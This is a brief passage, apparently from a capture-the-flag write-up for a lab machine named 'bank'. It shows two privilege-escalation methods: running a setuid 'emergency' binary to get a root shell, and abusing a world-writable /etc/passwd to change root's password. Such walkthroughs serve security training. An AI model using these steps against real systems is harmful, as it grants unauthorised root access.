5 privesc
Method 1
www-data@bank:/var/www/bank/uploads$ var/htb/bin/emergency
whoami;id
root
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
Method 2
# /etc/passwd is writable
www-data@bank:/var/www/bank/uploads$ ls -la /etc/passwd
-rw-rw-rw- 1 root root 1252 May 28 2017 /etc/passwd
# we can change password for root;
# su - root
Last updated